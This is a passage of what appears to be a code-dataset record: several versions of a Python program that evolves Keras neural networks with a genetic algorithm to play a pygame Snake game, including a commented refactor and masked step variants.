return weights
def roulette_selection(total_fitness):
global fitness
choice = random.randint(0, total_fitness)
parent = 0
current = 0
for idx in range(total_models):
current += fitness[idx]
if current > choice:
parent = idx
break
return parent
def genetic_updates():
global current_pool
global fitness
global generation
new_weights = []
total_fitness = sum(fitness)
for i in range(total_models // 2):
parent_1 = roulette_selection(total_fitness)
parent_2 = roulette_selection(total_fitness)
new = model_crossover(parent_1, parent_2)
update_w1 = model_mutate(new[0])
update_w2 = model_mutate(new[1])
new_weights.append(update_w1)
new_weights.append(update_w2)
for i in range(len(new_weights)):
current_pool[i].set_weights(new_weights[i])
generation += 1
return
<|reserved_special_token_0|>
class App:
"""
Main App for game
"""
def __init__(self):
self._running = True
self._display_surf = None
self.size = self.width, self.height = WIDTH, HEIGHT
self.clock = None
self.snake = Snake()
self.fruit = Fruit()
self.pause = False
self.moves = 0
self.frames = 11
def on_init(self):
pygame.init()
self._display_surf = pygame.display.set_mode(self.size, pygame.
HWSURFACE | pygame.DOUBLEBUF)
self._running = True
self.clock = pygame.time.Clock()
def on_event(self, event):
if event.type == pygame.QUIT:
self._running = False
if event.type == pygame.KEYDOWN:
if event.key == K_UP:
if self.frames < 1000000000:
self.frames *= 10
elif event.key == K_DOWN:
if self.frames > 10:
self.frames /= 10
elif event.key == K_p:
self.pause = not self.pause
elif event.key == K_q:
self.on_cleanup()
def on_loop(self, model_num):
self.snake.alive = self.snake.collision(self.snake.position[0])
if self.snake.alive is False:
return
if self.snake.eat(self.fruit) is True:
fitness[model_num] += 150
score[model_num] += 1
self.moves = 0
self.snake.update()
if check_if_closer(self.snake, self.fruit):
fitness[model_num] += 10
self.moves += 1
def on_render(self, model_num):
self._display_surf.fill((0, 124, 0))
for i in range(0, int(GRID_D)):
for j in range(0, int(GRID_D)):
if (i + j) % 2 == 0:
block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (
BLOCK_W, BLOCK_H)))
pygame.draw.rect(self._display_surf, (0, 200, 0), block)
self.fruit.draw(self._display_surf)
self.snake.draw(self._display_surf)
pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +
str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +
str(self.frames))
pygame.display.update()
def on_cleanup(self):
pygame.quit()
sys.exit()
def on_execute(self, i):
if self.on_init() == False:
self._running = False
while self._running:
for event in pygame.event.get():
self.on_event(event)
self.snake.direction = predict_direction(self.snake, self.fruit, i)
if self.pause is False:
self.on_loop(i)
self.on_render(i)
self.clock.tick(self.frames)
if self.snake.alive == False or self.moves == MAX_MOVES:
print(int(self.snake.score))
self.snake.reset()
self.fruit.random_generate()
self.moves = 0
print(fitness[i])
break
print(int(self.snake.score))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import random
import sys
import math
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Flatten, Conv2D, Activation
from snake_game import Snake
from snake_game import Fruit
import pygame
from pygame.locals import *
total_models = 50
current_pool = []
fitness = []
generation = 264
save = 0
save_location = 'Saved_Models/model'
load = 1
load_location = 'Saved_Models-better/model'
WIDTH = 480
HEIGHT = 480
GRID_D = 12
BLOCK_W = WIDTH / GRID_D
BLOCK_H = HEIGHT / GRID_D
MAX_MOVES = 150
score = []
def save_pool():
for i in range(total_models):
current_pool[i].save_weights(save_location + str(i) + '.keras')
print('Pool saved')
def create_model():
"""
Create Neural Network as a keras model
"""
model = Sequential()
model.add(Dense(12, input_dim=8, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(4, activation='sigmoid'))
model.compile(loss='mse', optimizer='adam')
return model
def predict_direction(snake, fruit, model_num):
"""
This function feeds information into the model, then determines
which direction the snake should go
"""
direction = snake.check_head()
fruit = snake.check_fruit(fruit)
n_input = np.concatenate([direction, fruit])
n_input = np.atleast_2d(n_input)
output = current_pool[model_num].predict(n_input, 1)
return output.argmax()
def model_crossover(parent_1, parent_2):
"""
Produce offspring based on the best parents
"""
global current_pool
weight1 = current_pool[parent_1].get_weights()
weight2 = current_pool[parent_2].get_weights()
new_weight1 = weight1
new_weight2 = weight2
gene = random.randint(0, len(new_weight1) - 1)
new_weight1[gene] = weight2[gene]
new_weight2[gene] = weight1[gene]
return np.asarray([new_weight1, new_weight2])
def model_mutate(weights):
"""
Mutate the weights of a model
"""
for i in range(len(weights)):
for j in range(len(weights[i])):
if random.uniform(0, 1) > 0.7:
change = random.uniform(-0.5, 0.5)
weights[i][j] += change
return weights
def roulette_selection(total_fitness):
global fitness
choice = random.randint(0, total_fitness)
parent = 0
current = 0
for idx in range(total_models):
current += fitness[idx]
if current > choice:
parent = idx
break
return parent
def genetic_updates():
global current_pool
global fitness
global generation
new_weights = []
total_fitness = sum(fitness)
for i in range(total_models // 2):
parent_1 = roulette_selection(total_fitness)
parent_2 = roulette_selection(total_fitness)
new = model_crossover(parent_1, parent_2)
update_w1 = model_mutate(new[0])
update_w2 = model_mutate(new[1])
new_weights.append(update_w1)
new_weights.append(update_w2)
for i in range(len(new_weights)):
current_pool[i].set_weights(new_weights[i])
generation += 1
return
def check_if_closer(snake, fruit):
head = snake.position[0]
prev = snake.position[1]
head_dis = math.sqrt((fruit.pos[0] - head[0]) ** 2 + (fruit.pos[1] -
head[1]) ** 2)
prev_dis = math.sqrt((fruit.pos[0] - prev[0]) ** 2 + (fruit.pos[1] -
prev[1]) ** 2)
if head_dis > prev_dis:
return False
return True
class App:
"""
Main App for game
"""
def __init__(self):
self._running = True
self._display_surf = None
self.size = self.width, self.height = WIDTH, HEIGHT
self.clock = None
self.snake = Snake()
self.fruit = Fruit()
self.pause = False
self.moves = 0
self.frames = 11
def on_init(self):
pygame.init()
self._display_surf = pygame.display.set_mode(self.size, pygame.
HWSURFACE | pygame.DOUBLEBUF)
self._running = True
self.clock = pygame.time.Clock()
def on_event(self, event):
if event.type == pygame.QUIT:
self._running = False
if event.type == pygame.KEYDOWN:
if event.key == K_UP:
if self.frames < 1000000000:
self.frames *= 10
elif event.key == K_DOWN:
if self.frames > 10:
self.frames /= 10
elif event.key == K_p:
self.pause = not self.pause
elif event.key == K_q:
self.on_cleanup()
def on_loop(self, model_num):
self.snake.alive = self.snake.collision(self.snake.position[0])
if self.snake.alive is False:
return
if self.snake.eat(self.fruit) is True:
fitness[model_num] += 150
score[model_num] += 1
self.moves = 0
self.snake.update()
if check_if_closer(self.snake, self.fruit):
fitness[model_num] += 10
self.moves += 1
def on_render(self, model_num):
self._display_surf.fill((0, 124, 0))
for i in range(0, int(GRID_D)):
for j in range(0, int(GRID_D)):
if (i + j) % 2 == 0:
block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (
BLOCK_W, BLOCK_H)))
pygame.draw.rect(self._display_surf, (0, 200, 0), block)
self.fruit.draw(self._display_surf)
self.snake.draw(self._display_surf)
pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +
str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +
str(self.frames))
pygame.display.update()
def on_cleanup(self):
pygame.quit()
sys.exit()
def on_execute(self, i):
if self.on_init() == False:
self._running = False
while self._running:
for event in pygame.event.get():
self.on_event(event)
self.snake.direction = predict_direction(self.snake, self.fruit, i)
if self.pause is False:
self.on_loop(i)
self.on_render(i)
self.clock.tick(self.frames)
if self.snake.alive == False or self.moves == MAX_MOVES:
print(int(self.snake.score))
self.snake.reset()
self.fruit.random_generate()
self.moves = 0
print(fitness[i])
break
print(int(self.snake.score))
if __name__ == '__main__':
for i in range(total_models):
model = create_model()
current_pool.append(model)
fitness.append(-100)
score.append(0)
if load == 1:
for i in range(total_models):
current_pool[i].load_weights(load_location + str(i) + '.keras')
theApp = App()
while True:
for i in range(total_models):
fitness[i] = 0
score[i] = 0
for i in range(total_models):
theApp.on_execute(i)
print('Higest score: ' + str(max(score)) + ' Model: ' + str(score.index
(max(score))) + ' Gen: ' + str(generation))
if save == 1:
save_pool()
genetic_updates()
<|reserved_special_token_1|>
import random
import sys
import math
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Flatten, Conv2D, Activation
from snake_game import Snake
from snake_game import Fruit
import pygame
from pygame.locals import *
# Neural Network / genetic-algorithm globals
total_models = 50          # population size: number of Keras models per generation
current_pool = []          # the live population of Keras models, indexed 0..total_models-1
fitness = []               # per-model fitness accumulated during play (parallel to current_pool)
generation = 264           # generation counter; starting value matches the loaded checkpoint
# Checkpointing: save = 1 writes weights after every generation, 0 disables saving
save = 0
save_location = "Saved_Models/model"          # prefix for saved weight files (suffix: <index>.keras)
load = 1                                      # 1 to load weights from load_location at startup, 0 to start fresh
load_location = "Saved_Models-better/model"   # prefix for weight files to load (suffix: <index>.keras)
# Game configurations (pixels / grid cells)
WIDTH = 480
HEIGHT = 480
GRID_D = 12                # board is GRID_D x GRID_D cells
BLOCK_W = WIDTH / GRID_D   # pixel width of one grid cell
BLOCK_H = HEIGHT / GRID_D  # pixel height of one grid cell
MAX_MOVES = 150            # moves allowed without eating before the run is cut short
score = []                 # per-model fruit count for the current generation (parallel to current_pool)
def save_pool():
    """Persist every model's weights to disk under save_location, one file per model."""
    for idx in range(total_models):
        current_pool[idx].save_weights(f"{save_location}{idx}.keras")
    print("Pool saved")
def create_model():
    """
    Build and compile one feed-forward network for the pool.

    Architecture: 8 inputs -> Dense(12, relu) -> Dense(16, relu)
    -> Dense(4, sigmoid), one output per movement direction,
    compiled with MSE loss and the Adam optimizer.
    """
    layers = [
        Dense(12, input_dim=8, activation='relu'),
        Dense(16, activation='relu'),
        Dense(4, activation='sigmoid'),
    ]
    model = Sequential(layers)
    model.compile(loss='mse', optimizer='adam')
    return model
def predict_direction(snake, fruit, model_num):
    """
    Run one forward pass of model `model_num` and pick a direction.

    The 8-element input is the snake's local obstacle sensing
    (check_head) concatenated with the fruit-relative features
    (check_fruit). Returns the argmax index (0-3) of the 4 outputs.
    """
    obstacle_features = snake.check_head()
    fruit_features = snake.check_fruit(fruit)
    features = np.atleast_2d(np.concatenate([obstacle_features, fruit_features]))
    prediction = current_pool[model_num].predict(features, 1)
    return prediction.argmax()
def model_crossover(parent_1, parent_2):
    '''
    Produce two offspring weight sets by swapping one randomly chosen
    weight "gene" (one layer tensor) between the two parent models.

    parent_1, parent_2: indices into current_pool.
    Returns an array-like pair [child_1_weights, child_2_weights].
    '''
    global current_pool
    # Weights of parents (lists of per-layer arrays)
    weight1 = current_pool[parent_1].get_weights()
    weight2 = current_pool[parent_2].get_weights()
    # Shallow-copy the layer lists. The original code aliased
    # new_weight1 to weight1, so assigning new_weight1[gene] mutated
    # weight1 before new_weight2[gene] = weight1[gene] read it: both
    # children ended up with parent_2's gene and no swap occurred.
    new_weight1 = list(weight1)
    new_weight2 = list(weight2)
    # Pick one gene (layer index) and swap it between the children
    gene = random.randint(0, len(new_weight1) - 1)
    new_weight1[gene], new_weight2[gene] = weight2[gene], weight1[gene]
    return np.asarray([new_weight1, new_weight2])
def model_mutate(weights):
    '''
    Randomly perturb a weight structure in place and return it.

    Each entry has a 30% chance (uniform(0,1) > 0.7) of being nudged
    by a uniform random amount in [-0.5, 0.5].
    '''
    for layer in weights:
        for idx in range(len(layer)):
            if random.uniform(0, 1) > .7:
                layer[idx] += random.uniform(-.5, .5)
    return weights
def roulette_selection(total_fitness):
    """
    Pick one model index with probability proportional to its fitness
    (roulette-wheel selection). Falls back to index 0 if the random
    threshold is never exceeded.
    """
    global fitness
    threshold = random.randint(0, total_fitness)
    chosen = 0
    running = 0
    for idx in range(total_models):
        running += fitness[idx]
        if running > threshold:
            chosen = idx
            break
    return chosen
def genetic_updates():
    """
    Breed a full replacement generation.

    Repeatedly selects two parents by roulette-wheel selection,
    crosses them over, mutates both children, then installs the new
    weights into the existing models and bumps the generation counter.
    """
    global current_pool
    global fitness
    global generation
    next_weights = []
    # Total fitness normalizes the roulette selection
    total_fitness = sum(fitness)
    # Each pairing yields two children, so half as many pairings as models
    for _ in range(total_models // 2):
        parent_a = roulette_selection(total_fitness)
        parent_b = roulette_selection(total_fitness)
        offspring = model_crossover(parent_a, parent_b)
        next_weights.append(model_mutate(offspring[0]))
        next_weights.append(model_mutate(offspring[1]))
    # Reuse the existing model objects; only their weights change
    for idx in range(len(next_weights)):
        current_pool[idx].set_weights(next_weights[idx])
    generation += 1
    return
def check_if_closer(snake, fruit):
    """
    Return True if the snake's head is at least as close to the fruit
    as the segment directly behind it was, False if it moved away.

    snake.position[0] is the head, snake.position[1] the previous
    head position; fruit.pos is the fruit's grid position.
    """
    head = snake.position[0]
    prev = snake.position[1]
    # math.dist computes the same Euclidean distance as the original
    # hand-rolled sqrt-of-squared-differences expressions.
    head_dis = math.dist(fruit.pos, head)
    prev_dis = math.dist(fruit.pos, prev)
    # Equal distance counts as "closer" (original returned True unless
    # the head was strictly farther than the previous position).
    return head_dis <= prev_dis
class App:
    '''
    Main pygame application: runs the snake game for one model at a
    time, feeding fitness/score updates into the module-level lists.
    '''
    def __init__(self):
        # Window / loop state
        self._running = True
        self._display_surf = None
        self.size = self.width, self.height = WIDTH, HEIGHT
        self.clock = None
        # Game objects
        self.snake = Snake()
        self.fruit = Fruit()
        self.pause = False
        self.moves = 0      # moves since the last fruit was eaten
        self.frames = 11    # tick rate; adjustable at runtime via arrow keys

    def on_init(self):
        """Initialize pygame, create the window and the frame clock."""
        pygame.init()
        self._display_surf = pygame.display.set_mode(self.size, pygame.HWSURFACE | pygame.DOUBLEBUF)
        self._running = True
        self.clock = pygame.time.Clock()

    def on_event(self, event):
        """Handle one pygame event: quit, speed change, pause, or exit."""
        # Quit game
        if event.type == pygame.QUIT:
            self._running = False
        # Keyboard controls (speed, pause, quit)
        if event.type == pygame.KEYDOWN:
            if event.key == K_UP:
                # Increase speed of game (x10, capped)
                if self.frames < 1000000000:
                    self.frames *= 10
            elif event.key == K_DOWN:
                # Decrease speed of game (/10, floored at 10 ticks)
                if self.frames > 10:
                    self.frames /= 10
            elif event.key == K_p:
                self.pause = not self.pause
            elif event.key == K_q:
                self.on_cleanup()

    def on_loop(self, model_num):
        """Advance one game step and update fitness/score for model_num."""
        self.snake.alive = self.snake.collision(self.snake.position[0])
        if self.snake.alive is False:
            return
        if self.snake.eat(self.fruit) is True:
            # Eating a fruit: large fitness reward, bump score,
            # reset the no-progress move counter
            fitness[model_num] += 150
            score[model_num] += 1
            self.moves = 0
        self.snake.update()
        if check_if_closer(self.snake, self.fruit):
            # Small reward for moving towards the fruit
            fitness[model_num] += 10
        self.moves += 1

    def on_render(self, model_num):
        """Draw the checkered board, snake, fruit, and window caption."""
        self._display_surf.fill((0,124,0))
        # Fill every other cell to create a two-tone checkerboard
        for i in range(0, int(GRID_D)):
            for j in range(0, int(GRID_D)):
                if (i + j) % 2 == 0:
                    block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (BLOCK_W, BLOCK_H)))
                    pygame.draw.rect(self._display_surf, (0, 200, 0), block)
        # Draw snake and fruit
        self.fruit.draw(self._display_surf)
        self.snake.draw(self._display_surf)
        pygame.display.set_caption("Gen: " + str(generation) + " Model: " + str(model_num) + " Score: " + str(self.snake.score) + " Tick " + str(self.frames))
        pygame.display.update()

    def on_cleanup(self):
        """Shut down pygame and terminate the process."""
        pygame.quit()
        sys.exit()

    def on_execute(self, i):
        """
        Run one full game for model index i.

        Loops until the snake dies or stalls for MAX_MOVES moves
        without eating, letting the neural net choose each direction.
        """
        if self.on_init() == False:
            self._running = False

        while (self._running):
            for event in pygame.event.get():
                self.on_event(event)
            # Neural net picks the next direction every frame
            self.snake.direction = predict_direction(self.snake, self.fruit, i)
            # Skip the game-state update while paused (still renders)
            if self.pause is False:
                self.on_loop(i)
            self.on_render(i)

            self.clock.tick(self.frames)
            # End this model's run when the snake dies or makes no
            # progress for MAX_MOVES moves
            if self.snake.alive == False or self.moves == MAX_MOVES:
                print(int(self.snake.score))
                self.snake.reset()
                self.fruit.random_generate()
                self.moves = 0
                # Print the fitness this model earned
                print(fitness[i])
                break
        # Clean up and print score
        # self.on_cleanup()
        print(int(self.snake.score))
if __name__ == "__main__" :
    # Build the population: one fresh model plus fitness/score slots each
    for i in range(total_models):
        model = create_model()
        current_pool.append(model)
        fitness.append(-100)
        score.append(0)

    # Optionally restore previously trained weights from disk
    if load == 1:
        for i in range(total_models):
            current_pool[i].load_weights(load_location + str(i) + ".keras")

    theApp = App()
    # Evolution loop: play every model, report, checkpoint, then breed
    while True:
        # Reset fitness scores and player scores for the new generation
        for i in range(total_models):
            fitness[i] = 0
            score[i] = 0
        # Play one full game per model
        for i in range(total_models):
            theApp.on_execute(i)
        # Print generation summary (best score and which model got it)
        print("Higest score: " + str(max(score)) + " Model: " + str(score.index(max(score))) + " Gen: " + str(generation))
        # Write these values to a file
        # fi = open("results.txt", "a+")
        # fi.write("Higest score: " + str(max(score)) + " Model: " + str(score.index(max(score))) + " Gen: " + str(generation) + "\r\n")
        # fi.close()
        # Save pool (only when checkpointing is enabled)
        if save == 1:
            save_pool()
        genetic_updates()
|
flexible
|
{
"blob_id": "fc1b9ab1fb1ae71d70b3bf5c879a5f604ddef997",
"index": 9969,
"step-1": "<mask token>\n\n\ndef save_pool():\n for i in range(total_models):\n current_pool[i].save_weights(save_location + str(i) + '.keras')\n print('Pool saved')\n\n\ndef create_model():\n \"\"\"\n Create Neural Network as a keras model\n \"\"\"\n model = Sequential()\n model.add(Dense(12, input_dim=8, activation='relu'))\n model.add(Dense(16, activation='relu'))\n model.add(Dense(4, activation='sigmoid'))\n model.compile(loss='mse', optimizer='adam')\n return model\n\n\ndef predict_direction(snake, fruit, model_num):\n \"\"\"\n This function feeds information into the model, then determines\n which direction the snake should go\n \"\"\"\n direction = snake.check_head()\n fruit = snake.check_fruit(fruit)\n n_input = np.concatenate([direction, fruit])\n n_input = np.atleast_2d(n_input)\n output = current_pool[model_num].predict(n_input, 1)\n return output.argmax()\n\n\n<mask token>\n\n\ndef model_mutate(weights):\n \"\"\"\n Mutate the weights of a model\n \"\"\"\n for i in range(len(weights)):\n for j in range(len(weights[i])):\n if random.uniform(0, 1) > 0.7:\n change = random.uniform(-0.5, 0.5)\n weights[i][j] += change\n return weights\n\n\n<mask token>\n\n\nclass App:\n \"\"\"\n Main App for game\n \"\"\"\n\n def __init__(self):\n self._running = True\n self._display_surf = None\n self.size = self.width, self.height = WIDTH, HEIGHT\n self.clock = None\n self.snake = Snake()\n self.fruit = Fruit()\n self.pause = False\n self.moves = 0\n self.frames = 11\n\n def on_init(self):\n pygame.init()\n self._display_surf = pygame.display.set_mode(self.size, pygame.\n HWSURFACE | pygame.DOUBLEBUF)\n self._running = True\n self.clock = pygame.time.Clock()\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self._running = False\n if event.type == pygame.KEYDOWN:\n if event.key == K_UP:\n if self.frames < 1000000000:\n self.frames *= 10\n elif event.key == K_DOWN:\n if self.frames > 10:\n self.frames /= 10\n elif event.key == K_p:\n self.pause = not 
self.pause\n elif event.key == K_q:\n self.on_cleanup()\n\n def on_loop(self, model_num):\n self.snake.alive = self.snake.collision(self.snake.position[0])\n if self.snake.alive is False:\n return\n if self.snake.eat(self.fruit) is True:\n fitness[model_num] += 150\n score[model_num] += 1\n self.moves = 0\n self.snake.update()\n if check_if_closer(self.snake, self.fruit):\n fitness[model_num] += 10\n self.moves += 1\n\n def on_render(self, model_num):\n self._display_surf.fill((0, 124, 0))\n for i in range(0, int(GRID_D)):\n for j in range(0, int(GRID_D)):\n if (i + j) % 2 == 0:\n block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (\n BLOCK_W, BLOCK_H)))\n pygame.draw.rect(self._display_surf, (0, 200, 0), block)\n self.fruit.draw(self._display_surf)\n self.snake.draw(self._display_surf)\n pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +\n str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +\n str(self.frames))\n pygame.display.update()\n\n def on_cleanup(self):\n pygame.quit()\n sys.exit()\n\n def on_execute(self, i):\n if self.on_init() == False:\n self._running = False\n while self._running:\n for event in pygame.event.get():\n self.on_event(event)\n self.snake.direction = predict_direction(self.snake, self.fruit, i)\n if self.pause is False:\n self.on_loop(i)\n self.on_render(i)\n self.clock.tick(self.frames)\n if self.snake.alive == False or self.moves == MAX_MOVES:\n print(int(self.snake.score))\n self.snake.reset()\n self.fruit.random_generate()\n self.moves = 0\n print(fitness[i])\n break\n print(int(self.snake.score))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef save_pool():\n for i in range(total_models):\n current_pool[i].save_weights(save_location + str(i) + '.keras')\n print('Pool saved')\n\n\ndef create_model():\n \"\"\"\n Create Neural Network as a keras model\n \"\"\"\n model = Sequential()\n model.add(Dense(12, input_dim=8, activation='relu'))\n model.add(Dense(16, activation='relu'))\n model.add(Dense(4, activation='sigmoid'))\n model.compile(loss='mse', optimizer='adam')\n return model\n\n\ndef predict_direction(snake, fruit, model_num):\n \"\"\"\n This function feeds information into the model, then determines\n which direction the snake should go\n \"\"\"\n direction = snake.check_head()\n fruit = snake.check_fruit(fruit)\n n_input = np.concatenate([direction, fruit])\n n_input = np.atleast_2d(n_input)\n output = current_pool[model_num].predict(n_input, 1)\n return output.argmax()\n\n\n<mask token>\n\n\ndef model_mutate(weights):\n \"\"\"\n Mutate the weights of a model\n \"\"\"\n for i in range(len(weights)):\n for j in range(len(weights[i])):\n if random.uniform(0, 1) > 0.7:\n change = random.uniform(-0.5, 0.5)\n weights[i][j] += change\n return weights\n\n\ndef roulette_selection(total_fitness):\n global fitness\n choice = random.randint(0, total_fitness)\n parent = 0\n current = 0\n for idx in range(total_models):\n current += fitness[idx]\n if current > choice:\n parent = idx\n break\n return parent\n\n\ndef genetic_updates():\n global current_pool\n global fitness\n global generation\n new_weights = []\n total_fitness = sum(fitness)\n for i in range(total_models // 2):\n parent_1 = roulette_selection(total_fitness)\n parent_2 = roulette_selection(total_fitness)\n new = model_crossover(parent_1, parent_2)\n update_w1 = model_mutate(new[0])\n update_w2 = model_mutate(new[1])\n new_weights.append(update_w1)\n new_weights.append(update_w2)\n for i in range(len(new_weights)):\n current_pool[i].set_weights(new_weights[i])\n generation += 1\n return\n\n\n<mask token>\n\n\nclass 
App:\n \"\"\"\n Main App for game\n \"\"\"\n\n def __init__(self):\n self._running = True\n self._display_surf = None\n self.size = self.width, self.height = WIDTH, HEIGHT\n self.clock = None\n self.snake = Snake()\n self.fruit = Fruit()\n self.pause = False\n self.moves = 0\n self.frames = 11\n\n def on_init(self):\n pygame.init()\n self._display_surf = pygame.display.set_mode(self.size, pygame.\n HWSURFACE | pygame.DOUBLEBUF)\n self._running = True\n self.clock = pygame.time.Clock()\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self._running = False\n if event.type == pygame.KEYDOWN:\n if event.key == K_UP:\n if self.frames < 1000000000:\n self.frames *= 10\n elif event.key == K_DOWN:\n if self.frames > 10:\n self.frames /= 10\n elif event.key == K_p:\n self.pause = not self.pause\n elif event.key == K_q:\n self.on_cleanup()\n\n def on_loop(self, model_num):\n self.snake.alive = self.snake.collision(self.snake.position[0])\n if self.snake.alive is False:\n return\n if self.snake.eat(self.fruit) is True:\n fitness[model_num] += 150\n score[model_num] += 1\n self.moves = 0\n self.snake.update()\n if check_if_closer(self.snake, self.fruit):\n fitness[model_num] += 10\n self.moves += 1\n\n def on_render(self, model_num):\n self._display_surf.fill((0, 124, 0))\n for i in range(0, int(GRID_D)):\n for j in range(0, int(GRID_D)):\n if (i + j) % 2 == 0:\n block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (\n BLOCK_W, BLOCK_H)))\n pygame.draw.rect(self._display_surf, (0, 200, 0), block)\n self.fruit.draw(self._display_surf)\n self.snake.draw(self._display_surf)\n pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +\n str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +\n str(self.frames))\n pygame.display.update()\n\n def on_cleanup(self):\n pygame.quit()\n sys.exit()\n\n def on_execute(self, i):\n if self.on_init() == False:\n self._running = False\n while self._running:\n for event in pygame.event.get():\n 
self.on_event(event)\n self.snake.direction = predict_direction(self.snake, self.fruit, i)\n if self.pause is False:\n self.on_loop(i)\n self.on_render(i)\n self.clock.tick(self.frames)\n if self.snake.alive == False or self.moves == MAX_MOVES:\n print(int(self.snake.score))\n self.snake.reset()\n self.fruit.random_generate()\n self.moves = 0\n print(fitness[i])\n break\n print(int(self.snake.score))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef save_pool():\n for i in range(total_models):\n current_pool[i].save_weights(save_location + str(i) + '.keras')\n print('Pool saved')\n\n\ndef create_model():\n \"\"\"\n Create Neural Network as a keras model\n \"\"\"\n model = Sequential()\n model.add(Dense(12, input_dim=8, activation='relu'))\n model.add(Dense(16, activation='relu'))\n model.add(Dense(4, activation='sigmoid'))\n model.compile(loss='mse', optimizer='adam')\n return model\n\n\ndef predict_direction(snake, fruit, model_num):\n \"\"\"\n This function feeds information into the model, then determines\n which direction the snake should go\n \"\"\"\n direction = snake.check_head()\n fruit = snake.check_fruit(fruit)\n n_input = np.concatenate([direction, fruit])\n n_input = np.atleast_2d(n_input)\n output = current_pool[model_num].predict(n_input, 1)\n return output.argmax()\n\n\ndef model_crossover(parent_1, parent_2):\n \"\"\"\n Produce offspring based on the best parents\n \"\"\"\n global current_pool\n weight1 = current_pool[parent_1].get_weights()\n weight2 = current_pool[parent_2].get_weights()\n new_weight1 = weight1\n new_weight2 = weight2\n gene = random.randint(0, len(new_weight1) - 1)\n new_weight1[gene] = weight2[gene]\n new_weight2[gene] = weight1[gene]\n return np.asarray([new_weight1, new_weight2])\n\n\ndef model_mutate(weights):\n \"\"\"\n Mutate the weights of a model\n \"\"\"\n for i in range(len(weights)):\n for j in range(len(weights[i])):\n if random.uniform(0, 1) > 0.7:\n change = random.uniform(-0.5, 0.5)\n weights[i][j] += change\n return weights\n\n\ndef roulette_selection(total_fitness):\n global fitness\n choice = random.randint(0, total_fitness)\n parent = 0\n current = 0\n for idx in range(total_models):\n current += fitness[idx]\n if current > choice:\n parent = idx\n break\n return parent\n\n\ndef genetic_updates():\n global current_pool\n global fitness\n global generation\n new_weights = []\n total_fitness = sum(fitness)\n for i in 
range(total_models // 2):\n parent_1 = roulette_selection(total_fitness)\n parent_2 = roulette_selection(total_fitness)\n new = model_crossover(parent_1, parent_2)\n update_w1 = model_mutate(new[0])\n update_w2 = model_mutate(new[1])\n new_weights.append(update_w1)\n new_weights.append(update_w2)\n for i in range(len(new_weights)):\n current_pool[i].set_weights(new_weights[i])\n generation += 1\n return\n\n\n<mask token>\n\n\nclass App:\n \"\"\"\n Main App for game\n \"\"\"\n\n def __init__(self):\n self._running = True\n self._display_surf = None\n self.size = self.width, self.height = WIDTH, HEIGHT\n self.clock = None\n self.snake = Snake()\n self.fruit = Fruit()\n self.pause = False\n self.moves = 0\n self.frames = 11\n\n def on_init(self):\n pygame.init()\n self._display_surf = pygame.display.set_mode(self.size, pygame.\n HWSURFACE | pygame.DOUBLEBUF)\n self._running = True\n self.clock = pygame.time.Clock()\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self._running = False\n if event.type == pygame.KEYDOWN:\n if event.key == K_UP:\n if self.frames < 1000000000:\n self.frames *= 10\n elif event.key == K_DOWN:\n if self.frames > 10:\n self.frames /= 10\n elif event.key == K_p:\n self.pause = not self.pause\n elif event.key == K_q:\n self.on_cleanup()\n\n def on_loop(self, model_num):\n self.snake.alive = self.snake.collision(self.snake.position[0])\n if self.snake.alive is False:\n return\n if self.snake.eat(self.fruit) is True:\n fitness[model_num] += 150\n score[model_num] += 1\n self.moves = 0\n self.snake.update()\n if check_if_closer(self.snake, self.fruit):\n fitness[model_num] += 10\n self.moves += 1\n\n def on_render(self, model_num):\n self._display_surf.fill((0, 124, 0))\n for i in range(0, int(GRID_D)):\n for j in range(0, int(GRID_D)):\n if (i + j) % 2 == 0:\n block = pygame.Rect(((j * BLOCK_W, i * BLOCK_H), (\n BLOCK_W, BLOCK_H)))\n pygame.draw.rect(self._display_surf, (0, 200, 0), block)\n self.fruit.draw(self._display_surf)\n 
self.snake.draw(self._display_surf)\n pygame.display.set_caption('Gen: ' + str(generation) + ' Model: ' +\n str(model_num) + ' Score: ' + str(self.snake.score) + ' Tick ' +\n str(self.frames))\n pygame.display.update()\n\n def on_cleanup(self):\n pygame.quit()\n sys.exit()\n\n def on_execute(self, i):\n if self.on_init() == False:\n self._running = False\n while self._running:\n for event in pygame.event.get():\n self.on_event(event)\n self.snake.direction = predict_direction(self.snake, self.fruit, i)\n if self.pause is False:\n self.on_loop(i)\n self.on_render(i)\n self.clock.tick(self.frames)\n if self.snake.alive == False or self.moves == MAX_MOVES:\n print(int(self.snake.score))\n self.snake.reset()\n self.fruit.random_generate()\n self.moves = 0\n print(fitness[i])\n break\n print(int(self.snake.score))\n\n\n<mask token>\n",
